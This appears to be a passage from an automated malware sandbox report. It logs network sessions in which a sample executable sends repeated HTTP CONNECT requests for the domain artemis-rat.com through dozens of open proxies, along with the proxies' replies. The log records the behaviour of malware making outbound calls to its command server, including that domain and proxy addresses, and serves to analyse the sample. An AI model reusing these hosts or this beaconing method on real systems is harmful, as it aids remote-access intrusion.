                                              Mar 11, 2024 08:37:19.316296101 CET65INHTTP/1.1 200 Connection Established
                                              Content-Type: text/plain


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              401192.168.2.451092203.112.134.7456787284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.806082964 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.616233110 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              402192.168.2.45116646.17.63.16641547284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.900089979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.197865009 CET339INHTTP/1.1 403 Forbidden
                                              Server: squid/4.7
                                              Mime-Version: 1.0
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 5
                                              X-Squid-Error: TCP_RESET 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              X-Cache: MISS from proxy.wakoopa.com
                                              Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                              Connection: keep-alive
                                              Data Raw: 72 65 73 65 74
                                              Data Ascii: reset


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              403192.168.2.451146178.154.228.1690507284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.900666952 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:31.980936050 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                              Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              404192.168.2.45114047.236.252.2188887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.901520014 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              405192.168.2.45114391.134.140.160325887284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.901623011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.631820917 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.866419077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.054179907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.266705036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:31.569717884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              406192.168.2.451226159.203.61.16931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.901634932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:23.763159037 CET28INHTTP/1.1 400 Bad Request


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              407192.168.2.450479178.236.246.5331287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.901681900 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:22.069428921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:38:27.617897987 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              408192.168.2.45127438.162.19.9631287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.901851892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.435545921 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              409192.168.2.45128023.152.40.1550507284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.902359962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:39:33.145993948 CET39INHTTP/1.1 200 Connection established


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              410192.168.2.45128838.162.6.14931287284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.902359962 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.341543913 CET111INHTTP/1.1 407 Proxy Authentication Required
                                              Proxy-Authenticate: Basic realm=""
                                              Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                              Data Ascii: Proxy Authentication Required


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              411192.168.2.451167111.90.150.10910807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.902430058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              412192.168.2.451324162.241.46.40622447284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.902523041 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              413192.168.2.45126874.119.144.6041457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.902765989 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              414192.168.2.451328107.181.168.14541457284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.903045893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              415192.168.2.451330159.65.77.16885857284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.903089046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              416192.168.2.451276181.78.19.2499997284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.903162956 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.475547075 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:20.263817072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:21.866904974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:24.846827984 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:27.866595030 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:30.866527081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:36.908561945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:48.866343021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              417192.168.2.451351104.18.161.122807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.903177977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.057775021 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              418192.168.2.45055250.233.111.162321007284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.903264046 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              419192.168.2.45127872.206.181.97649437284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.903332949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              420192.168.2.4512175.61.33.234807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.903390884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.205569983 CET327INHTTP/1.1 400 Bad Request
                                              Server: nginx/1.18.0 (Ubuntu)
                                              Date: Mon, 11 Mar 2024 07:37:19 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              421192.168.2.451373104.17.37.235807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.903450966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.057974100 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              422192.168.2.451377104.20.75.31807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.903621912 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.058078051 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              423192.168.2.451383172.67.182.3807284C:\Users\user\Desktop\SecuriteInfo.com.Win64.MalwareX-gen.15169.25783.exe
                                              TimestampBytes transferredDirectionData
                                              Mar 11, 2024 08:37:18.903893948 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                              Host: artemis-rat.com
                                              Proxy-Connection: Keep-Alive
                                              Mar 11, 2024 08:37:19.058523893 CET316INHTTP/1.1 400 Bad Request
                                              Server: cloudflare
                                              Date: Mon, 11 Mar 2024 07:37:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 155
                                              Connection: close
                                              CF-RAY: -
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
